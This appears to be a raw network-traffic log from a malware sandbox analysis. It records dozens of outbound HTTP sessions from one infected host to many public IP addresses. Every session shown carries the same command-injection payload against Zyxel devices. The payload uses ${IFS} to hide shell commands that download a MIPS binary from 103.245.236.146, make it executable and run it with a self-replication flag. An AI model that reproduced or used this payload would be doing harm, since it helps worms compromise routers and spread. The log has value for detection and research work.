                                                        Jan 28, 2024 10:12:51.388461113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4204192.168.2.144982876.215.162.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.388497114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4205192.168.2.1433516155.36.108.157443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.388518095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4206192.168.2.145558662.152.240.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.388556957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4207192.168.2.1458966210.198.214.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.388595104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4208192.168.2.145818613.255.5.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.388633013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4209192.168.2.14376181.186.200.50443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.388679028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4210192.168.2.144736834.243.164.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.396039963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4211192.168.2.144872291.145.50.52443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.396069050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4212192.168.2.144312483.109.176.210443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.396100044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4213192.168.2.1455218104.143.35.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.396167994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4214192.168.2.14457229.124.252.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.396209002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4215192.168.2.1441600152.131.227.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.396246910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4216192.168.2.1443838158.126.29.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.396303892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4217192.168.2.144442660.133.248.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.396333933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4218192.168.2.1451430137.182.179.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.396362066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4219192.168.2.1449850217.38.178.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.396397114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4220192.168.2.1450968187.4.87.254443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.396450996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4221192.168.2.1435364139.235.80.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.396481991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4222192.168.2.144209853.142.35.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.396542072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4223192.168.2.1452722198.11.1.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.396573067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4224192.168.2.1454842190.78.67.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.396615028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4225192.168.2.1453936140.9.201.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.396651030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4226192.168.2.1439056150.192.156.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.396708012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4227192.168.2.1454540118.172.123.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.396752119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4228192.168.2.144579681.154.71.52443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.396794081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4229192.168.2.145358013.111.111.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.396820068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4230192.168.2.143374680.247.194.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.396872044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4231192.168.2.1450666168.19.196.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.396905899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4232192.168.2.145940087.95.17.246443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.396931887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4233192.168.2.1458424137.253.121.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.397023916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4234192.168.2.1448946121.215.17.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.397027969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4235192.168.2.144381476.184.144.247443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.397063017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4236192.168.2.1455452158.128.10.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.397102118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4237192.168.2.1445096172.37.241.230443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.397135973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4238192.168.2.145579031.71.243.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.397190094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4239192.168.2.145364817.12.180.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.397206068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4240192.168.2.1460618131.197.60.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.397243977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4241192.168.2.145804636.221.1.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.397288084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4242192.168.2.143607096.39.93.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.397309065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4243192.168.2.14535584.105.42.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.397353888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4244192.168.2.1444726111.13.205.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.397397995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4245192.168.2.146041241.219.188.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.397433043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4246192.168.2.1440594142.70.66.208443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.397480965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4247192.168.2.145622866.114.172.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.397502899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4248192.168.2.144650436.94.29.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.397536993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4249192.168.2.1440788135.30.191.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.397578001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4250192.168.2.1445490143.157.155.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.397623062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4251192.168.2.1436572111.143.130.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.397653103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4252192.168.2.1456040220.144.55.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.397685051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4253192.168.2.14561868.174.189.199443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.397728920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4254192.168.2.1445392184.144.244.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.397772074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4255192.168.2.1438236125.46.130.230443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.397810936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4256192.168.2.1443938163.19.171.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.397841930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4257192.168.2.144054878.185.34.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.397866964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4258192.168.2.1438140169.90.27.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.397914886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4259192.168.2.1450026117.66.2.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.397973061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4260192.168.2.1453820182.14.200.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.398017883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4261192.168.2.143509490.199.217.50443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.398039103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4262192.168.2.144289853.86.99.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.398094893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4263192.168.2.1438244160.104.190.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.398139954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4264192.168.2.1449786165.47.139.217443
                                                        TimestampBytes transferredDirectionData
